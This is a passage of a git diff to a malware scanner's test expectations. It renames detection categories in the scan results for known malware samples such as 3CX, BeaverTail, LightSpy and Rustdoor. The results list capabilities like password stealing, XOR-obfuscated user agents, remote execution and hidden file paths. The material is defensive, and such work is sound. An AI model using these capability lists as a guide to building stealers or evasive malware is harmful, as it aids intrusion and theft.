[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) |
| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code)
[zip files](https://github.com/search?q=zip+files&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/perl/bin/perl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fperl%2Fbin%2Fperl&type=code) |
| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) |
| LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) |
diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple
index bc884bf20..ea0e3b51a 100644
--- a/tests/linux/mimipenguin/python/mimipenguin.simple
+++ b/tests/linux/mimipenguin/python/mimipenguin.simple
@@ -7,6 +7,7 @@ credential/password/finder: high
credential/ssh/d: medium
data/base64/decode: medium
data/encoding/base64: low
+discover/process/name: medium
discover/processes/list: medium
discover/system/platform: medium
exfil/stealer/password: critical
@@ -22,4 +23,3 @@ net/url/embedded: low
os/fd/read: low
persist/daemon: medium
privesc/sudo: medium
-process/name_get: medium
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
index 327667eb1..a7aea4804 100644
Binary files a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff and b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff differ
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
index 5df35e886..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
@@ -24,7 +24,7 @@
| +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7������UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) |
| +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) |
| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
-| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
+| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
| +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) |
| +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) |
| +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
@@ -37,7 +37,7 @@
| +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
| +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
| +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
| +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff
index 327667eb1..a7aea4804 100644
Binary files a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff and b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff differ
diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
index 5df35e886..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
@@ -24,7 +24,7 @@
| +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7������UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) |
| +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) |
| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
-| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
+| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
| +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) |
| +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) |
| +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
@@ -37,7 +37,7 @@
| +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
| +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
| +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
| +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
index 5df35e886..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
@@ -24,7 +24,7 @@
| +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7������UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) |
| +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) |
| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
-| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
+| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) |
| +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) |
| +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) |
| +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) |
@@ -37,7 +37,7 @@
| +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
| +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
| +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
| +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple
index a73095bc6..845055316 100644
--- a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple
+++ b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple
@@ -1,7 +1,7 @@
# macOS/2024.79-137-192-4/var_tmp_exe_starting2: critical
anti-static/xor/certs: high
c2/tool_transfer/osascript: high
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/var_tmp: medium
exec/script/osa: medium
exec/shell/exec: medium
fs/file/make_executable: high
diff --git a/tests/macOS/2024.BeaverTail/Jami.json b/tests/macOS/2024.BeaverTail/Jami.json
index 2728b51ed..fb6273f27 100644
--- a/tests/macOS/2024.BeaverTail/Jami.json
+++ b/tests/macOS/2024.BeaverTail/Jami.json
@@ -37,6 +37,14 @@
"ID": "anti-static/binary/opaque",
"RuleName": "opaque_binary"
},
+ {
+ "Description": "higher entropy binary (\u003e7.2)",
+ "RiskScore": 2,
+ "RiskLevel": "MEDIUM",
+ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/entropy.yara#high_entropy_7_2",
+ "ID": "anti-static/macho/entropy",
+ "RuleName": "high_entropy_7_2"
+ },
{
"Description": "higher-entropy machO trailer (normally NULL) - possible viral infection",
"MatchStrings": [
diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple
index 54e68b086..71e1b84c2 100644
--- a/tests/macOS/2024.BeaverTail/client_5346.py.simple
+++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple
@@ -4,7 +4,8 @@ c2/tool_transfer/python: high
data/encoding/base64: low
discover/system/platform: medium
discover/user/HOME: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
+evasion/indicator_blocking/hidden_window: medium
evasion/indicator_blocking/mask_exceptions: medium
exec/imports/python: medium
exec/install_additional/pip_install: high
diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple
index 5851a1c32..65223eaba 100644
--- a/tests/macOS/2024.Ezuri/libdpt1.so.simple
+++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple
@@ -3,7 +3,7 @@ anti-static/macho/footer: high
anti-static/packer/aes: high
anti-static/packer/ezuri: critical
crypto/aes: low
-discover/system/cpu_info: low
+discover/system/cpu: low
exec/plugin: low
exec/program: medium
fs/file/read: low
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 8e89a4371..a1eedf707 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -6,10 +6,11 @@ c2/tool_transfer/macos: critical
crypto/aes: low
crypto/xor: high
data/hash/md5: medium
-discover/system/cpu_info: low
-discover/system/network: high
+discover/multiple: high
+discover/process/name: medium
+discover/system/cpu: low
discover/system/platform: medium
-evasion/hidden_paths/odd_pidfile: high
+evasion/file/location/pidfile: high
exec/dylib/symbol_address: medium
exec/dylib/user: medium
exec/plugin: low
@@ -30,5 +31,4 @@ os/kernel/dispatch_semaphore: low
os/sync/semaphore_user: low
persist/daemon: medium
persist/pid_file: medium
-process/name_get: medium
sus/entitlement: medium
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index 93837a90a..f5189151e 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -15,15 +15,16 @@ crypto/aes: low
data/compression/gzip: low
data/compression/zstd: low
data/embedded/zstd: medium
-discover/network/interface_get: low
-discover/system/cpu_info: medium
-discover/system/hardware_info: low
-discover/system/hostname_get: low
+discover/network/interface: low
+discover/system/cpu: medium
+discover/system/hardware: low
+discover/system/hostname: low
discover/user/USER: low
-evasion/hidden_paths/relative_hidden: low
+evasion/file/attr/chflags: high
exec/dylib/symbol_address: medium
exec/program: medium
exec/program/background: low
+exec/program/hidden: medium
exec/script/osa: medium
exec/shell/exec: medium
exfil/stealer/notes: critical
diff --git a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
index dafd23ce8..685d7b1d2 100644
--- a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
+++ b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
@@ -12,7 +12,7 @@ data/hash/blake2b: low
data/hash/sha1: low
data/random/insecure: low
discover/network/interface_list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: low
exec/cmd/pipe: medium
exec/dylib/address_check: low
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index 939d68075..523345be4 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
@@ -1,13 +1,13 @@
## Deleted: ls.x86_64 [🟡 MEDIUM]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
-| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) |
-| -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
-| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
-| -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
-| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|---------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
+| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) |
+| -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
+| -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
+| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
## Added: ls [🔵 LOW]
diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2
index 9e0e93a9c..902593b69 100644
--- a/tests/macOS/clean/ls.sdiff.trigger_2
+++ b/tests/macOS/clean/ls.sdiff.trigger_2
@@ -1,6 +1,6 @@
--- missing: ls.x86_64
-data/compression/lzma
--discover/system/hostname_get
+-discover/system/hostname
-exec/shell/TERM
-fs/link_read
-net/url/embedded
diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3
